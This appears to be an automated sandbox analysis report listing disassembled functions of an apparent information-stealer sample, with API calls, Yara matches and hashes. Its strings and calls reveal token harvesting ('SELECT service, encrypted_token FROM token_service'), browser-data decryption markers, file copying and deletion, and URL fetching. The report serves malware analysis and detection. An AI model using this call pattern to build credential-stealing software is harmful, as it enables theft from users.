                                  • Instruction ID: 7c7fe568c3c3bb04c8668f924665e5d52cd48b0fdf4e0d91caa5e9dd75cfee37
                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                  • Instruction Fuzzy Hash: 005160B5960318ABDF20DFD0CC54BEE7779AF04705F4080A8B606A7184DBB46A89CF95
                                  Function 022F4FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022F4FEE
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F5017
                                  • lstrcat.KERNEL32(?,00421000), ref: 022F5034
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                    • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                  • memset.MSVCRT ref: 022F507A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F50A3
                                  • lstrcat.KERNEL32(?,00421020), ref: 022F50C0
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                    • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                    • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  • memset.MSVCRT ref: 022F5106
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F512F
                                  • lstrcat.KERNEL32(?,00421038), ref: 022F514C
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C17
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022F4C2C
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C49
                                    • Part of subcall function 022F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022F4C85
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,0064A524), ref: 022F4CB1
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022F4CC3
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CD7
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022F4CE9
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CFD
                                    • Part of subcall function 022F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022F4D13
                                    • Part of subcall function 022F4B77: DeleteFileA.KERNEL32(?), ref: 022F4D98
                                  • memset.MSVCRT ref: 022F5192
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID:
                                  • API String ID: 4017274736-0
                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction ID: 50a4548b2ab4c15d9b3e8341d4de7ecc42de74cd4848995be7608fbb4be062fc
                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction Fuzzy Hash: BD41D679A5031867CB50F7F0EC46FDD7739AB24701F8044A4B689660C4EEB857D88F92
                                  Function 022F8367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022F8397
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F839E
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022F83BF
                                  • __aulldiv.LIBCMT ref: 022F83D9
                                  • __aulldiv.LIBCMT ref: 022F83E7
                                  • wsprintfA.USER32 ref: 022F8413
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: @
                                  • API String ID: 2774356765-2766056989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 2d68da53c4ba1d969d834fcd5b3df6404f30349dff1adc3d4272adc9a355352d
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: AC2138B1E54218ABDB00DFD5DC49FAEFBB9FB44B04F104619F605BB284C7B869008BA5
                                  Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 1440504306-1079375795
                                  • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                  • Opcode Fuzzy Hash: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                  Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: B
                                  • API String ID: 1494266314-2248957098
                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                  Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                  • memset.MSVCRT ref: 00409EE8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 1977917189-1096346117
                                  • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                  • Opcode Fuzzy Hash: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                  Function 022E7837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                    • Part of subcall function 022E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                    • Part of subcall function 022E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                    • Part of subcall function 022E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                    • Part of subcall function 022E7537: HeapFree.KERNEL32(00000000), ref: 022E76C0
                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 022E786D
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78AF
                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 022E78C1
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78F6
                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 022E7907
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E793A
                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 022E7954
                                  • task.LIBCPMTD ref: 022E7962
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID:
                                  • API String ID: 2677904052-0
                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction ID: 2939e9c7883b69d7bc3ff7d2ae94d0cc368a1a2341d43c68e786eb586915e3cc
                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction Fuzzy Hash: A1314F75A50209EFDF04EBE0DC94DFEB776EB59301F505018E106672A4DA34A942DF62
                                  Function 022E5217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022E5231
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E5238
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022E5251
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022E5278
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022E52A8
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 022E52F1
                                  • InternetCloseHandle.WININET(?), ref: 022E5320
                                  • InternetCloseHandle.WININET(?), ref: 022E532D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction ID: a8c2018a1be64044be499e83949fdde298d2854408df4f827856bee4c968367c
                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction Fuzzy Hash: 6B3118B8A50218ABDB20CF94DC84BDCB7B5EB48704F5081D9F709A7284D7B46AC5CF98
                                  Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 3894370878-0
                                  • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                  • Opcode Fuzzy Hash: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                  Function 022F5777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022F58AB
                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022F5908
                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022F5ABE
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022F548F
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5596
                                    • Part of subcall function 022F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F55EA
                                    • Part of subcall function 022F5527: strtok.MSVCRT(00000000,?), ref: 022F5605
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5615
                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022F59F2
                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022F5BA7
                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022F5C73
                                  • Sleep.KERNEL32(0000EA60), ref: 022F5C82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID:
                                  • API String ID: 3630751533-0
                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction ID: 688620f2968f751a2717c213b2df6fcde1427aaefe87c9250c7e18e4c4253aae
                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction Fuzzy Hash: 0DE11071920304AACB58FBE0DD96DEDF37AAF55700F808178A60A66198EF345B5CCF91
                                  Function 022E1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022E158E
                                    • Part of subcall function 022E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                    • Part of subcall function 022E1507: RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                    • Part of subcall function 022E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                    • Part of subcall function 022E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                    • Part of subcall function 022E1507: RegCloseKey.ADVAPI32(?), ref: 022E1566
                                  • lstrcat.KERNEL32(?,00000000), ref: 022E15B6
                                  • lstrlen.KERNEL32(?), ref: 022E15C3
                                  • lstrcat.KERNEL32(?,004262EC), ref: 022E15DE
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022E16CC
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                  • DeleteFileA.KERNEL32(00000000), ref: 022E1756
                                  • memset.MSVCRT ref: 022E177D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID:
                                  • API String ID: 3885987321-0
                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction ID: ec0ae5f51aa62174a407ebcbfa03b32d5cac057fa9c474fdf387058e8e41fc6b
                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction Fuzzy Hash: CB514DB19603189BCB59FBA0DD91EEDB37AAF54700F4041B8A70E62184EE345B89CF95
                                  Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0088AB70,00000000,000F003F,?,00000400), ref: 004184EC
                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                  • RegQueryValueExA.ADVAPI32(00000000,0088AAE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                  • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                  Function 022E4A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction ID: a8d43c492d7d6147a6ac3b4b495328721cac0bdb4fda7375b645000892042c31
                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction Fuzzy Hash: F5215BB5D00219ABDF10DFA4EC48AEDBB75FF04320F008225F929A7290EB706A05CF91
                                  Function 022F78F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F790B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7912
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022F7944
                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022F7965
                                  • RegCloseKey.ADVAPI32(00000000), ref: 022F796F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
